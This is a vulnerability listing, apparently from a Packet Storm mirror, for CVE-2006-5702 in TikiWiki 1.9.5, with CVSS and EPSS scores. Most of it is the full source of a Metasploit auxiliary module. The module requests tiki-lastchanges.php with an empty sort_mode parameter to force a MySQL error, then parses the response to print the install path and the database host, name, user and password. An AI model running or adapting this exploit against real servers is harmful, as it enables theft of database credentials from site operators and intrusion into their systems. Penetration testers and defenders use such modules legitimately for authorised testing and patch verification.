TikiWiki Information Disclosure

2024-08-3100:00:00

Jay Turla, metasploit.com

packetstormsecurity.com

tikiwiki

information disclosure

mysql

user

password

exploit

vulnerability

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

Confidence

Low

EPSS

0.018

Percentile

88.5%

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'TikiWiki Information Disclosure',  
'Description' => %q{  
A vulnerability has been reported in Tikiwiki, which can be exploited by  
an anonymous user to dump the MySQL user & passwd just by creating a mysql  
error with the "sort_mode" var.  
  
The vulnerability was reported in Tikiwiki version 1.9.5.  
},  
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['OSVDB', '30172'],  
['BID', '20858'],  
['CVE', '2006-5702'],  
['URL', 'https://web.archive.org/web/20080211225557/http://secunia.com/advisories/22678/'],  
],  
'DisclosureDate' => '2006-11-01',  
'Actions' =>  
[  
['Dump', 'Description' => 'Dump user and password']  
],  
'DefaultAction' => 'Dump'  
))  
  
register_options(  
[  
OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),  
])  
end  
  
def run  
print_status("Establishing a connection to the target...")  
  
uri = normalize_uri(datastore['URI'], '/tiki-lastchanges.php')  
rpath = uri + "?days=1&offset=0&sort_mode="  
  
res = send_request_raw({  
'uri' => rpath,  
'method' => 'GET',  
'headers' =>  
{  
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',  
'Connection' => 'Close',  
}  
}, 25)  
  
if (res and res.message == "OK")  
print_status("Get information about database...")  
  
n = 0  
c = 0  
  
# puts "body is #{res.body.length} bytes"  
infos = res.body.split(/\r?\n/)  
infos.each do |row|  
# puts row.inspect  
if (c < 6)  
if (row.match(/\["file"\]=>/))  
c+=1  
x = n + 1  
y = infos[x].match(/string\(\d+\) "(.*)"/m)  
print_status("Install path : #{y[1]}")  
end  
if (row.match(/\["databaseType"\]=>/))  
c+=1  
x = n + 1  
y = infos[x].match(/string\(\d+\) "(.*)"/m)  
print_status("DB type : #{y[1]}")  
end  
if (row.match(/\["database"\]=>/))  
c+=1  
x = n + 1  
y = infos[x].match(/string\(\d+\) "(.*)"/m)  
print_status("DB name : #{y[1]}")  
end  
if (row.match(/\["host"\]=>/))  
c+=1  
x = n + 1  
y = infos[x].match(/string\(\d+\) "(.*)"/m)  
print_status("DB host : #{y[1]}")  
end  
if (row.match(/\["user"\]=>/))  
c+=1  
x = n + 1  
y = infos[x].match(/string\(\d+\) "(.*)"/m)  
print_status("DB user : #{y[1]}")  
end  
if (row.match(/\["password"\]=>/))  
c+=1  
x = n + 1  
y = infos[x].match(/string\(\d+\) "(.*)"/m)  
print_status("DB password : #{y[1]}")  
end  
n+=1  
end  
end  
  
if (c == 0)  
print_status("Could not obtain information about database.")  
end  
  
else  
print_status("No response from the server.")  
end  
end  
end  
`